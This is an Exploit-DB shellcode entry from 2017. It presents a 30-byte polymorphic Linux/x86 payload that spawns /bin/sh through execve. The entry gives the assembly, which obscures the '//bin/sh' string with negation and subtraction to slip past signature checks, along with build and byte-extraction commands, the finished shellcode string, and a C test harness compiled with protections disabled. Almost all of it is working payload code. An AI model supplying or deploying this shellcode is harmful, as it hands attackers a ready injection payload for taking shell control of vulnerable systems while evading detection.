Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)

EDB-ID:

42977

CVE:

N/A




Platform:

Linux_x86

Date:

2017-10-12


/*
 Title: Linux/x86 - Polymorphic execve /bin/sh x86 shellcode - 30 bytes
 Author: Manuel Mancera (@sinkmanu)
 Tested on: Linux 3.16.0-4-586 #1 Debian 3.16.43-2+deb8u2 (2017-06-26)
i686 GNU/Linux
 
----------------- Assembly code -------------------

global _start           

section .text
_start:
    xor eax, eax
    push eax
    mov edi, 0x978cd092
    mov ebx, edi
    neg edi
    push edi
    sub ebx, 0x2e2aa163
    push ebx
    mov ebx, esp
    push eax
    push ebx
    mov ecx, esp
    mov al, 11
    int 0x80
 
---------------------------------------------------
$ nasm -f elf32 poly-execve.nasm -o poly-execve.o
$ ld poly-execve.o -o poly-execve
$ objdump -d ./poly-execve|grep '[0-9a-f]:'|grep -v 'file'|cut -f2
-d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/
/\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x50\xbf\x92\xd0\x8c\x97\x89\xfb\xf7\xdf\x57\x81\xeb\x63\xa1\x2a\x2e\x53\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
$ ./shellcode
Length: 30 bytes
$
*/
 
#include <stdio.h>
#include <string.h>

const char code[] =  \
"\x31\xc0\x50\xbf\x92\xd0\x8c\x97\x89\xfb\xf7\xdf\x57\x81\xeb\x63\xa1\x2a\x2e\x53\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main()
{
    printf("Length: %d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
}